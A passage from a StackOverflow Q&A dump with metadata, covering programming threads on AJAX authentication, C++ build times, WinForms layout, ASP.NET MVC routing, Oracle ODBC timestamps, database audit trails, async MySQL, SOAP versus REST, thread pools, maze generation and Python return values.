The only slighlty tricky part here is splitting the input on a single ','. You could write a separate function for this that would scan through the string and keep a count of the openbrackets - closedbrakets seen so far. Then only split on commas when the count is equal to zero.
A: Make a recursive function that takes the string and an integer offset, and "reads" out an array. That is, have it return an array or string (that it has read) and an integer offset pointing after the array. For example:
s = "[[this, is],[a, nested],[array]]"
yourFunc(s, 1) # returns ['this', 'is'] and 11.
yourFunc(s, 2) # returns 'this' and 6.
Then you can call it with another function that provides an offset of 0, and makes sure that the finishing offset is the length of the string.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38409",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Security advice for jquery ajax data post? I'm using jquery ajax to post updates back to my server. I'm concerned about making sure I have put in place appropriate measures so that only my AJAX calls can post data.
My stack is PHP on Apache against a MySQL backend.
Advice greatly appreciated!
A: Use sessions to ensure that any Ajax posts are done in an authenticated context. Think of your Ajax code as just another client to your server, it becomes easier to tackle authentication issues that way.
A: Any request that the AJAX calls in your pages can make can also be made by someone outside of the application. If done right, you will not be able to tell if they were made as part of an AJAX call from your webapp or by hand/other means.
There are two scenarios I can think of which you might be talking about when you say you want to make sure that only your AJAX calls can post data: either you don't want a malicious user to be able to post data that interferes with another user's data or you actually want to restrict the posts to being in the "flow" of a multi-request operation.
If you are concerned with the first case (someone posting malicious data to/as another user) the solution is the same whether you are using AJAX or not -- you just have to authenticate the user through whatever means is necessary -- usually via session cookie.
If you are concerned with the second case, then you are going to have to do something like issue a unique token at each step of the process, and store the expected token on the server side. Then when a request is made, check that there is a corresponding entry on the server side for the action that is being taken and that the expected tokens match and that that token has not been used yet. If there is no, you reject the request, if there is, then you mark that token as used and process the request.
If what you are concerned about is something other than one of these two scenarios then the answer will depend on more specifics than you have provided.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38421",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Tips for working in a large library? I'm currently working on a quite large library (5M lines of code, in C++ under VS2005, 1 solution and close to 100 projects). Even though we distribute compilation, and use incremental linking, recompilation and relinking after small source modifications takes between a few minutes (usually at least 3) and close to one hour.
This means that our modify code/build/debug cycles tend to be really long (to my taste!), and it's quite easy to lose the 'flow' during a build: there's typically not much time to do anything useful (maybe do a bit of email, otherwise read some article online or a few pages of a book).
When writing new code or doing major refactoring, I try to compile one file at a time only. However, during debugging for example, it really gets on my nerves!
I'm wondering how I could optimize my time? I guess I'm not the only one in that situation: what do/would you do?
A: I don't know much about development at that level, but... it seems like it would be a good idea to separate into multiple solutions. You could have a final "pre-ship" step that consolidates them all into a single .dll if you/your customers really insist.
Compare, e.g., to the .NET Framework where we have lots of different assemblies (System, System.Drawing, System.Windows.Forms, System.Xml...). Presumably all of these could be in different solutions, referencing each other's build results (as opposed to all in a single solution, referencing each other as projects).
A: Step by step...
The only solution is to start isolating blocks of code. If you don't have too much implementation leakage (see below **) then start building fachades that isolate the classes behind. Move those clases to a different project and make the fachade load the dlls on startup and redirect the calls to factory methods.
Focus on finding areas/libraries that are fairly stable and split them to isolated library dlls. Building and versioning them separately will help you to avoid integration pains.
I have been on that situation on the past and the only way is to take the task with patience.
By the way, a good side effect of splitting code is that interfaces became cleaner and the output dll size is smaller!!. In our project suffling/reorganizing the code around and reducing the amount of gratuitous includes reduced the final output by 30%.
good luck!
** --> a consumer calling obj->GetMemberZ()->GetMemberYT->GiveMeTheData(param1, param2)
A: @Domenic: indeed, it would be a good thing... However, a whole team's been at it for some time now, and until they succeed we are stuck with a single .dll and something quite monolithic :-(
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38427",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Positioning controls in the middle of a CheckBox THis is a followup to my previous question "Font-dependent control positioning." It's an attempt to solve the real problem behind that question, perhaps in ways different than the one I was asking about.
Example of the problem statement: I want a checkbox that says "Adjust prices by <X> <Y> after loading," where <X> is a number---adjustable with a NumericUpDown---and <Y> is either "percent" or "dollars," with the choices being made by a ComboBox. This will be on a single line.
The complication: I want to be able to change my fonts for all these controls (basically setting them to System.Drawing.Fonts.MessageBoxFont, which is Tahoma 8 pt on Windows XP/etc. and Segoe UI 9 pt on Vista), without messing up my layout, which with my current Position-property--setting paradigm does not work.
More generally, I'd like the controls to be dynamically laid out in a font-independent way, so that the <X> NumericUpDown fits snugly into the space between "by " and the <Y> ComboBox, and similarly the <X> ComboBox fits in with respect to the <X> CheckBox and the string " after loading" to its right.
The part everyone seems to miss: This is all nested within a CheckBox. So, ideally, clicking on the words "after loading" should check/uncheck the checkbox, and draw that little highlight rectangle around "Adjust prices by after loading." So just slapping an extra Label on the end doesn't work, because then it doesn't toggle the CheckBox; similarly, trying to band-aid things by hooking up such a Label's Click event won't produce the desired highlight-rectangle.
Solutions? At this point I'm thinking either:
*
*Rethink the problem, somehow, maybe with an ugly solution like two separate lines of text: "Adjust found prices after loading" (CheckBox), "Adjustment amount:" (NumericUpDown and ComboBox). This is really bad because my options box is absolutely full of options of this type (i.e. the type in the example), so it would at least double in vertical size.
*Some sort of custom control? SplittableCheckBox?
*Some kind of magic with a TableLayout control? (Pretty sure this fails at "the part everyone seems to miss.)
*Give up and either go back to MS Sans Serif, or use Tahoma uniformly, or package Segoe UI with my application, thus disrespecting the system default fonts.
*(New, via edit) Switch to WPF, if someone can convince me that it supports this scenario exactly.
A: If you have several options that follow this layout, why not create a user control? The user control will contain the CheckBox, a NumericUpDown, a ComboBox and a label for the "after loading". You can override OnFontChanged to adjust the location of the controls based on the rendering of the text with the given font. Add an EventHandler to the Label to check/uncheck the CheckBox.
As for having the focus rectangle surround all of the controls, you should be able to give the user control focus when one of its inner controls is clicked.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38428",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: ASP.NET MVC - How do action names affect the url? Using MVC out of the box I found the generated URLs can be misleading and I wanted to know if this can be fixed or if my approach/understanding is wrong.
Suppose I have a CreateEgg page, which has a form on it, and once the form is filled in and submitted the user is taken to a ListEggs page with the new egg in it.
So my egg controller will look some thing like this:
public class EggController : Controller
{
public void Add()
{
//do stuff
RenderView("CreateEgg", viewData);
}
public void Create()
{
//do stuff
RenderView("ListEggs", viewData);
}
}
So my first page will have a url of something like http://localhost/egg/add and the form on the page will have an action of:
using (Html.Form<EggController>(c => c.Create())
Meaning the second page will have a url of http://localhost/Egg/Create, to me this is misleading, the action should be called Create, because im creating the egg, but a list view is being displayed so the url of http://localhost/Egg/List would make more scene. How do I achieve this without making my view or action names misleading?
A: The problem is your action does two things, violating the Single Responsibility Principle.
If your Create action redirects to the List action when it's done creating the item, then this problem disappears.
A: ActionVerbs Outlined in Scott Gu's post seem to be a good approch;
Scott says:
You can create overloaded
implementations of action methods, and
use a new [AcceptVerbs] attribute to
have ASP.NET MVC filter how they are
dispatched. For example, below we can
declare two Create action methods -
one that will be called in GET
scenarios, and one that will be called
in POST scenarios
[AcceptVerbs("GET")]
public object Create() {}
[AcceptVerbs("POST")]
public object Create(string productName, Decimal unitPrice) {}
A: How A Method Becomes An Action by Phil Haack
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38431",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Retrieving an Oracle timestamp using Python's Win32 ODBC module Given an Oracle table created using the following:
CREATE TABLE Log(WhenAdded TIMESTAMP(6) WITH TIME ZONE);
Using the Python ODBC module from its Win32 extensions (from the win32all package), I tried the following:
import dbi, odbc
connection = odbc.odbc("Driver=Oracle in OraHome92;Dbq=SERVER;Uid=USER;Pwd=PASSWD")
cursor = connection.cursor()
cursor.execute("SELECT WhenAdded FROM Log")
results = cursor.fetchall()
When I run this, I get the following:
Traceback (most recent call last):
...
results = cursor.fetchall()
dbi.operation-error: [Oracle][ODBC][Ora]ORA-00932: inconsistent datatypes: expected %s got %s
in FETCH
The other data types I've tried (VARCHAR2, BLOB) do not cause this problem. Is there a way of retrieving timestamps?
A: I believe this is a bug in the Oracle ODBC driver. Basically, the Oracle ODBC driver does not support the TIMESTAMP WITH (LOCAL) TIME ZONE data types, only the TIMESTAMP data type. As you have discovered, one workaround is in fact to use the TO_CHAR method.
In your example you are not actually reading the time zone information. If you have control of the table you could convert it to a straight TIMESTAMP column. If you don't have control over the table, another solution may be to create a view that converts from TIMESTAMP WITH TIME ZONE to TIMESTAMP via a string - sorry, I don't know if there is a way to convert directly from TIMESTAMP WITH TIME ZONE to TIMESTAMP.
A: My solution to this, that I hope can be bettered, is to use Oracle to explicitly convert the TIMESTAMP into a string:
cursor.execute("SELECT TO_CHAR(WhenAdded, 'YYYY-MM-DD HH:MI:SSAM') FROM Log")
This works, but isn't portable. I'd like to use the same Python script against a SQL Server database, so an Oracle-specific solution (such as TO_CHAR) won't work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38435",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: How to track data changes in a database table What is the best way to track changes in a database table?
Imagine you got an application in which users (in the context of the application not DB users ) are able to change data which are store in some database table. What's the best way to track a history of all changes, so that you can show which user at what time change which data how?
A: You've got a few issues here that don't relate well to each other.
At the basic database level you can track changes by having a separate table that gets an entry added to it via triggers on INSERT/UPDATE/DELETE statements. Thats the general way of tracking changes to a database table.
The other thing you want is to know which user made the change. Generally your triggers wouldn't know this. I'm assuming that if you want to know which user changed a piece of data then its possible that multiple users could change the same data.
There is no right way to do this, you'll probably want to have a separate table that your application code will insert a record into whenever a user updates some data in the other table, including user, timestamp and id of the changed record.
Make sure to use a transaction so you don't end up with cases where update gets done without the insert, or if you do the opposite order you don't end up with insert without the update.
A: One method I've seen quite often is to have audit tables. Then you can show just what's changed, what's changed and what it changed from, or whatever you heart desires :) Then you could write up a trigger to do the actual logging. Not too painful if done properly...
No matter how you do it, though, it kind of depends on how your users connect to the database. Are they using a single application user via a security context within the app, are they connecting using their own accounts on the domain, or does the app just have everyone connecting with a generic sql-account?
If you aren't able to get the user info from the database connection, it's a little more of a pain. And then you might look at doing the logging within the app, so if you have a process called "CreateOrder" or whatever, you can log to the Order_Audit table or whatever.
Doing it all within the app opens yourself up a little more to changes made from outside of the app, but if you have multiple apps all using the same data and you just wanted to see what changes were made by yours, maybe that's what you wanted... <shrug>
Good luck to you, though!
--Kevin
A: In researching this same question, I found a discussion here very useful. It suggests having a parallel table set for tracking changes, where each change-tracking table has the same columns as what it's tracking, plus columns for who changed it, when, and if it's been deleted. (It should be possible to generate the schema for this more-or-less automatically by using a regexed-up version of your pre-existing scripts.)
A: Suppose I have a Person Table with 10 columns which include PersonSid and UpdateDate. Now, I want to keep track of any updates in Person Table.
Here is the simple technique I used:
*
*Create a person_log table
create table person_log(date datetime2, sid int);
*Create a trigger on Person table that will insert a row into person_log table whenever Person table gets updated:
create trigger tr on dbo.Person
for update
as
insert into person_log(date, sid) select updatedDTTM, PersonSID from inserted
After any updates, query person_log table and you will be able to see personSid that got updated.
Same you can do for Insert, delete.
Above example is for SQL, let me know in case of any queries or use this link :
https://web.archive.org/web/20211020134839/https://www.4guysfromrolla.com/webtech/042507-1.shtml
A: In general, if your application is structured into layers, have the data access tier call a stored procedure on your database server to write a log of the database changes.
In languages that support such a thing aspect-oriented programming can be a good technique to use for this kind of application. Auditing database table changes is the kind of operation that you'll typically want to log for all operations, so AOP can work very nicely.
Bear in mind that logging database changes will create lots of data and will slow the system down. It may be sensible to use a message-queue solution and a separate database to perform the audit log, depending on the size of the application.
It's also perfectly feasible to use stored procedures to handle this, although there may be a bit of work involved passing user credentials through to the database itself.
A: A trace log in a separate table (with an ID column, possibly with timestamps)?
Are you going to want to undo the changes as well - perhaps pre-create the undo statement (a DELETE for every INSERT, an (un-) UPDATE for every normal UPDATE) and save that in the trace?
A: Let's try with this open source component:
https://tabledependency.codeplex.com/
TableDependency is a generic C# component used to receive notifications when the content of a specified database table change.
A: If all changes from php. You may use class to log evry INSERT/UPDATE/DELETE before query. It will be save action, table, column, newValue, oldValue, date, system(if need), ip, UserAgent, clumnReference, operatorReference, valueReference. All tables/columns/actions that need to log are configurable.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38437",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "47"
} |
Q: Asynchronous Mysql connector Do any asynchronous connectors exist for Mysql that can be used within a C or C++ application? I'm looking for something that can be plugged into a reactor pattern written in Boost.Asio.
[Edit:] Running a synchronous connector in threads is not an option.
A: http://forums.mysql.com/read.php?45,183339,183339
enjoy
Updated link to the original article showing how to do async mysql queries:
http://jan.kneschke.de/projects/mysql/async-mysql-queries-with-c-api/
A: I had a similar problem with a very different technologies: Twisted python (reactor-based IO) and sqlAlchemy (??). While searching for a solution, I found about an sAsync project that simply created a separate thread for sqlAlchemy and then responded to requests.
Given that ASIO is based on low level OS features (such as aio_read() or ReadFileEx() etc) and an OS-level reactor (or proactor, in Windows' case) I don't think you have another chance than emulating the 'asynchronousness' by similar means.
Running a synchronous connector in threads is not an option
Think about it: the libmysqlclient / mysqlclient.dll you're using makes synchronous socket calls. The OS scheduler will correctly switch to another thread until the I/O is finished, so what's the difference? (apart from the fact that you shouldn't make 2k threads for this..)
Edit: mysql_real_connect() supports an UNIX socket parameter. You can supposedly read yourself from the mysql server port and write to that UNIX socket only using ASIO. Like a proxyfication.
A: [ Running a synchronous connector in threads is not an option
Think about it: the libmysqlclient / mysqlclient.dll you're using makes synchronous socket calls. The OS scheduler will correctly switch to another thread until the I/O is finished]
This is bugging me! - the 'another thread' could as easily be a second sync. connection to mysql, and should be handled by mysql just as it would another client altogether? My gutfeel is that it should work using multiple threads.
A: MySQL Connector/C++ is a C++ implementation of JDBC 4.0
The reference customers who use MySQL Connector/C++ are:
- OpenOffice - MySQL Workbench
Learn more: http://forums.mysql.com/read.php?167,221298
A: I know this is an old question, but consider looking at the new Boost.Mysql library: https://anarthal.github.io/mysql/index.html
A: I think the only solution will be to create an asynchronous service that wraps a standard connector. You'll need to understand the ODBC APIs though.
A: There is a project called DBSlayer that puts another layer in front of MySQL that you talk to through JSON. http://code.nytimes.com/projects/dbslayer
A: have you considered using libdrizzle? i have used only an old version, from when it was a separate project from drizzle, and i tested the asynchronous query features, but i never did any actual benchmarks worth mentioning.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38447",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Is SOAP now a legacy technology? Are people still writing SOAP services or is it a technology that has passed its architectural shelf life? Are people returning to binary formats?
A: The alternative to SOAP is not binary formats.
I think you're seeing a surge in the desire to leave the complexities of WS-* behind in favor of REST and JSON, because they're much simpler to use and don't require frameworks to be used successfully. The problems that WS-* ostensibly tries to solve aren't problems for most users, but they have to pay for the complexity any way.
A: I still write WS-*–based services. Somewhat surprisingly, I've had less trouble with them when trying to inter-operate with less capable developers. This is because if I send them a WSDL file, they know how to crank it through their tool and get an API they can call, while being blissfully unaware what is happening under the hood. To give customers a REST-ful service, I have to start talking to them about HTTP and XML, which they really don't understand as well as they think they do, and then I start getting a headache.
In other words, to be successful with REST, both the service provider and consumer have to know what they're doing (and they can keep things simple and come up with a great, non–WS-* solution). With WS-* technologies, it can still succeed even if only one party has a clue.
I think, however, that REST-oriented standards that are much less complicated than current WS standards, will eventually emerge, and when that happens, comparable tools will be available too.
A: I think so. RESTful solutions are more and more sensible for the vast majority of use cases; the complexities of SOAP and other RPC technologies just aren't worth the effort anymore.
A: I wouldn't consider SOAP legacy at all. REST vs. SOAP is really just the continuation of the debate of COM/CORBA vs. HTTP POST/GET etc. SOAP is nothing more than an updated version of the same principles defined with C and C (contracts, providers, consumers etc.). It's just that has appeared to SOAP succeed (at least partially) where the other two failed (and it could be that SOAP just has a better marketing team), that is that SOAP really does allow to different systems to connect rather easily compared to it's predecessors. That being said, it still suffers from the same drawbacks that COM/CORBA did...it can get really complex.
I think REST is just coming back into style at the moment. It's nothing new, people are just taking another look at it. Look at the web. It's REST and it's been around for years. 5 years from now people are going to look back and say the same thing about it being legacy and the need to change. It's the nature of software development. Everything goes in cycles.
The debate about which one is better is going to be just like the tabs vs. spaces debate. There are going to be people on different sides swearing that one is better. Really in the end, they both accomplish the same goal. Sure one will be a better solution than the other in some situations, but in the end neither will be superior 100% of the time.
A: We were using SOAP, but since we control both messaging endpoints (thick client out on the web connecting to our servers) we decided that the "lingua franca" of XML wasn't offering any real benefit. Instead, we're experimenting with binary serialization via Google protocol buffers, and like everything we've learned so far. It's somewhat CORBA-esque, but doesn't make me grumpy the way CORBA did. Still haven't found the best fit for the RPC layer, but pretty sure the payload will be protocol buffers.
The point I'm trying to make is that if you control both sides of the conversation, there are significant efficiency advantages in bypassing the XML tax.
A: Yes, some people still are (and now it's 2011!). I think the main reason is that MS WCF automatically generates SOAP bindings. The horror.
A: It's impossible to define what the best technology solution is without considering what the problem is, in other words, what the context is. Both REST and SOAP have their place. If you have a high traffic site and a development audience who is comfortable with REST, then SOAP would be a bad choice, primarily because the message size is so incredibly bloated. If you have small scale site with a modest development budget, then SOAP will be a superior choice due to automatic proxy generation from WSDL. To make a fair comparison, it should be mentioned that implementing a REST conversation takes more development time and therefore is more expensive, a very relevant fact for your boss.
While it is true that SOAP is a more complicated protocol, in my experience this doesn't translate to maintainability issues. That's because messages ride on HTTP and can be easily debugged just like REST message, and the SOAP stacks available on major platforms are very solid.
The complexity of SOAP is of course an advantage if your requirements include sophisticated items like federated message security. On the other hand, these kind of requirements are not seen that often in my experience. The WS standards committee may have been vulnerable to some YAGNI issues. Now that web service communication is commonplace, it's turning out to be simpler that was originally envisioned.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38463",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Thread pool for executing arbitrary tasks with different priorities I'm trying to come up with a design for a thread pool with a lot of design requirements for my job. This is a real problem for working software, and it's a difficult task. I have a working implementation but I'd like to throw this out to SO and see what interesting ideas people can come up with, so that I can compare to my implementation and see how it stacks up. I've tried to be as specific to the requirements as I can.
The thread pool needs to execute a series of tasks. The tasks can be short running (<1sec) or long running (hours or days). Each task has an associated priority (from 1 = very low to 5 = very high). Tasks can arrive at any time while the other tasks are running, so as they arrive the thread pool needs to pick these up and schedule them as threads become available.
The task priority is completely independant of the task length. In fact it is impossible to tell how long a task could take to run without just running it.
Some tasks are CPU bound while some are greatly IO bound. It is impossible to tell beforehand what a given task would be (although I guess it might be possible to detect while the tasks are running).
The primary goal of the thread pool is to maximise throughput. The thread pool should effectively use the resources of the computer. Ideally, for CPU bound tasks, the number of active threads would be equal to the number of CPUs. For IO bound tasks, more threads should be allocated than there are CPUs so that blocking does not overly affect throughput. Minimising the use of locks and using thread safe/fast containers is important.
In general, you should run higher priority tasks with a higher CPU priority (ref: SetThreadPriority). Lower priority tasks should not "block" higher priority tasks from running, so if a higher priority task comes along while all low priority tasks are running, the higher priority task will get to run.
The tasks have a "max running tasks" parameter associated with them. Each type of task is only allowed to run at most this many concurrent instances of the task at a time. For example, we might have the following tasks in the queue:
*
*A - 1000 instances - low priority - max tasks 1
*B - 1000 instances - low priority - max tasks 1
*C - 1000 instances - low priority - max tasks 1
A working implementation could only run (at most) 1 A, 1 B and 1 C at the same time.
It needs to run on Windows XP, Server 2003, Vista and Server 2008 (latest service packs).
For reference, we might use the following interface:
namespace ThreadPool
{
class Task
{
public:
Task();
void run();
};
class ThreadPool
{
public:
ThreadPool();
~ThreadPool();
void run(Task *inst);
void stop();
};
}
A: So what are we going to pick as the basic building block for this. Windows has two building blocks that look promising :- I/O Completion Ports (IOCPs) and Asynchronous Procedure Calls (APCs). Both of these give us FIFO queuing without having to perform explicit locking, and with a certain amount of built-in OS support in places like the scheduler (for example, IOCPs can avoid some context switches).
APCs are perhaps a slightly better fit, but we will have to be slightly careful with them, because they are not quite "transparent". If the work item performs an alertable wait (::SleepEx, ::WaitForXxxObjectEx, etc.) and we accidentally dispatch an APC to the thread then the newly dispatched APC will take over the thread, suspending the previously executing APC until the new APC is finished. This is bad for our concurrency requirements and can make stack overflows more likely.
A:
It needs to run on Windows XP, Server 2003, Vista and Server 2008 (latest service packs).
What feature of the system's built-in thread pools make them unsuitable for your task? If you want to target XP and 2003 you can't use the new shiny Vista/2008 pools, but you can still use QueueUserWorkItem and friends.
A: @DrPizza - this is a very good question, and one that strikes right to the heart of the problem. There are a few reasons why QueueUserWorkItem and the Windows NT thread pool was ruled out (although the Vista one does look interesting, maybe in a few years).
Firstly, we wanted to have greater control over when it starts up and stops threads. We have heard that the NT thread pool is reluctant to start up a new thread if it thinks that the tasks are short running. We could use the WT_EXECUTELONGFUNCTION, but we really have no idea if the task is long or short
Secondly, if the thread pool was already filled up with long running, low priority tasks, there would be no chance of a high priority task getting to run in a timely manner. The NT thread pool has no real concept of task priorities, so we can't do a QueueUserWorkItem and say "oh by the way, run this one right away".
Thirdly, (according to MSDN) the NT thread pool is not compatible with the STA apartment model. I'm not sure quite what this would mean, but all of our worker threads run in an STA.
A:
@DrPizza - this is a very good question, and one that strikes right to the heart of the problem. There are a few reasons why QueueUserWorkItem and the Windows NT thread pool was ruled out (although the Vista one does look interesting, maybe in a few years).
Yeah, it looks like it got quite beefed up in Vista, quite versatile now.
OK, I'm still a bit unclear about how you wish the priorities to work. If the pool is currently running a task of type A with maximal concurrency of 1 and low priority, and it gets given a new task also of type A (and maximal concurrency 1), but this time with a high priority, what should it do?
Suspending the currently executing A is hairy (it could hold a lock that the new task needs to take, deadlocking the system). It can't spawn a second thread and just let it run alongside (the permitted concurrency is only 1). But it can't wait until the low priority task is completed, because the runtime is unbounded and doing so would allow a low priority task to block a high priority task.
My presumption is that it is the latter behaviour that you are after?
A: @DrPizza:
OK, I'm still a bit unclear about how
you wish the priorities to work. If
the pool is currently running a task
of type A with maximal concurrency of
1 and low priority, and it gets given
a new task also of type A (and maximal
concurrency 1), but this time with a
high priority, what should it do?
This one is a bit of a tricky one, although in this case I think I would be happy with simply allowing the low-priority task to run to completion. Usually, we wouldn't see a lot of the same types of tasks with different thread priorities. In our model it is actually possible to safely halt and later restart tasks at certain well defined points (for different reasons than this) although the complications this would introduce probably aren't worth the risk.
Normally, only different types of tasks would have different priorities. For example:
*
*A task - 1000 instances - low priority
*B task - 1000 instances - high priority
Assuming the A tasks had come along and were running, then the B tasks had arrived, we would want the B tasks to be able to run more or less straight away.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38501",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What's a good algorithm to generate a maze? Say you want a simple maze on an N by M grid, with one path through, and a good number of dead ends, but that looks "right" (i.e. like someone made it by hand without too many little tiny dead ends and all that). Is there a known way to do this?
A: It turns out there are 11 classic algorithms to generate "perfect" mazes. A maze is perfect if it has one, and only one, solution. Here are some links to each algorithm, in rough order of my preference.
*
*Kruskal's
*Prim's
*Recursive Backtracker
*Aldous-Broder
*Growing Tree
*Hunt-and-Kill
*Wilson's
*Eller's
*Recursive Division (Predictable)
*Sidewinder (Predictable)
*Binary Tree (Flawed)
For more info, check out mazelib on GitHub, a Python library implementing all the standard maze generating/solving algorithms.
A: Strangely enough, by slightly changing the 'canonical' rules and starting from a random configuration, Conway's Game of Life seems to generate pretty nice mazes!
(I don't remember the exact rule, but it's a very simple modification that tends to 'densify' the population of cells...)
A: From http://www.astrolog.org/labyrnth/algrithm.htm
Recursive backtracker: This is somewhat related to the recursive backtracker solving method described below, and requires stack up to the size of the Maze. When carving, be as greedy as possible, and always carve into an unmade section if one is next to the current cell. Each time you move to a new cell, push the former cell on the stack. If there are no unmade cells next to the current position, pop the stack to the previous position. The Maze is done when you pop everything off the stack. This algorithm results in Mazes with about as high a "river" factor as possible, with fewer but longer dead ends, and usually a very long and twisty solution. It runs quite fast, although Prim's algorithm is a bit faster. Recursive backtracking doesn't work as a wall adder, because doing so tends to result in a solution path that follows the outside edge, where the entire interior of the Maze is attached to the boundary by a single stem.
They produce only 10% dead ends
is an example of a maze generated by that method.
A: A pretty straightforward solution could be to assign random weights to the graph edges and apply Kruskal's algorithm to find a minimum spanning tree.
Best discussion ever on maze generation algorithms: http://www.jamisbuck.org/presentations/rubyconf2011/index.html (was on HN a couple days ago).
A: Recursive Backtracking is the easiest algorithm to implement.
Here's a Java implementation:
Here Cell is a class representing a cell in a 2D grid and cells is a 2D array of Cell objects. Cell has boolean variables top, bottom, left and right to indicate whether a cell has walls on these sides, a boolean variable visited to check whether we have traversed it and two integer variables row and col to indicate its position in the grid.
Cell current = cells[0][0] , next;
current.visited=true;
do{
next = getNeighbour(current);
if(next!=null){
removeWall(current , next);
st.push(current);
current = next;
current.visited = true;
}
else {
current = st.pop();
}
}
while (!st.empty());
private Cell getNeighbour(Cell cell){
ArrayList<Cell> ara = new ArrayList<>();
if(cell.col>0 && !cells[cell.col-1][cell.row].visited)
ara.add(cells[cell.col-1][cell.row]);
if(cell.row>0 && !cells[cell.col][cell.row-1].visited)
ara.add(cells[cell.col][cell.row-1]);
if(cell.col<col-1 && !cells[cell.col+1][cell.row].visited)
ara.add(cells[cell.col+1][cell.row]);
if(cell.row<row-1 && !cells[cell.col][cell.row+1].visited)
ara.add(cells[cell.col][cell.row+1]);
if(ara.size()>0){
return ara.get(new Random().nextInt(ara.size()));
}else{
return null;
}
}
private void removeWall(Cell curr , Cell nxt){
if((curr.col == nxt.col) && (curr.row == nxt.row+1)){/// top
curr.top=nxt.botttom=false;
}
if(curr.col==nxt.col && curr.row == nxt.row-1){///bottom
curr.botttom = nxt.top = false;
}
if(curr.col==nxt.col-1 && curr.row==nxt.row ){///right
curr.right = nxt.left = false;
}
if(curr.col == nxt.col+1 && curr.row == nxt.row){///left
curr.left = nxt.right = false;
}
}
A: One of the methods to generate a maze is the randomized version of Prim's algorithm.
Start with a grid full of walls.
Pick a cell, mark it as part of the maze. Add the walls of the cell to the wall list.
While there are walls in the list:
Pick a random wall from the list. If the cell on the opposite side isn't in the maze yet:
(i) Make the wall a passage and mark the cell on the opposite side as part of the maze.
(ii) Add the neighboring walls of the cell to the wall list.
If the cell on the opposite side already was in the maze, remove the wall from the list.
A: My favorite way is to use Kruskal's algorithm, but when randomly choosing and edge to remove, weight the choice based on the types of edges it's connected to.
By varying the weights for different edge types, you can generate mazes with lots of distinct characteristics or "personalities". See my example here:
https://mtimmerm.github.io/webStuff/maze.html
A: Here's the DFS algorithm written as pseudocode:
create a CellStack (LIFO) to hold a list of cell locations
set TotalCells = number of cells in grid
choose a cell at random and call it CurrentCell
set VisitedCells = 1
while VisitedCells < TotalCells
find all neighbors of CurrentCell with all walls intact
if one or more found
choose one at random
knock down the wall between it and CurrentCell
push CurrentCell location on the CellStack
make the new cell CurrentCell
add 1 to VisitedCells
else
pop the most recent cell entry off the CellStack
make it CurrentCell
endIf
endWhile
A: I prefer a version of the Recursive Division algorithm. It is described in detail here.
I will give a quick overview:
The original recursive division algorithm works as follows. First, start with an empty area for the maze. Add one straight wall to divide the chamber in two, and put one hole in that wall somewhere. Then, recursively repeat this process on each of the two new chambers until the desired passage size is reached. This is simple and works well, but there are obvious bottlenecks which make the maze easy to solve.
The variant solves this problem by drawing randomized, "curved" walls rather than straight ones, making the bottlenecks less obvious.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38502",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "76"
} |
Q: What's the best way to return multiple values from a function? I have a function where I need to do something to a string. I need the function to return a boolean indicating whether or not the operation succeeded, and I also need to return the modified string.
In C#, I would use an out parameter for the string, but there is no equivalent in Python. I'm still very new to Python and the only thing I can think of is to return a tuple with the boolean and modified string.
Related question: Is it pythonic for a function to return multiple values?
A: Returning a tuple is the usual way to do this in Python.
A: Why not throw an exception if the operation wasn't successful? Personally, I tend to be of the opinion that if you need to return more than one value from a function, you should reconsider if you're doing things the right way or use an object.
But more directly to the point, if you throw an exception, you're forcing them to deal with the problem. If you try to return a value that indicates failure, it's very well possible somebody could not check the value and end up with some potentially hard to debug errors.
A: Throwing an exception for failure is one good way to proceed, and if you're returning a lot of different values, you can return a tuple. For the specific case you're citing, I often take an intermediate approach: return the modified string on success, and return None on failure. I'm enough of an unreconstructed C programmer to want to return a NULL pointer to char on failure.
If I were writing a routine to be used as part of a larger library and consumed by other developers, I'd throw an exception on failure. When I'm eating my own dogfood, I'll probably return different types and test on return.
A: Return a tuple.
def f(x):
# do stuff
return (True, modified_string)
success, modified_string = f(something)
A: def f(in_str):
out_str = in_str.upper()
return True, out_str # Creates tuple automatically
succeeded, b = f("a") # Automatic tuple unpacking
A: You can use return statement with multiple expressions
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38508",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "78"
} |
Q: C# WinForms - DataGridView/SQL Compact - Negative integer in primary key column I'm just getting dirty in WinForms, and I've discovered, through a lovely tutorial, the magic of dragging a database table onto the design view of my main form. So, all is lovely, I've got my DataGridView with all of the columns represented beautifully.
BUT...
When I run my application against this brand new, empty .sdf (empty save for the two tables I've created, which are themselves empty), I get a -1 in the column corresponding to my primary key/identity column whenever I try to create that first record.
Any idea why this might be happening? If it helps, the column is an int.
A: @Brian -1 is a good choice for the default value since no "real" rows are likely to have identities less than zero. If it defaulted to 0 or 1 then there'd be a chance that it'd clash with an existing row, causing a primary key violation.
For applications that stay offline and create multiple rows before saving, a common practice is to continue counting backwards (-2, -3, -4) for each new row's identity. Then when they're saved, the server can replace them with the true "next" value from the table.
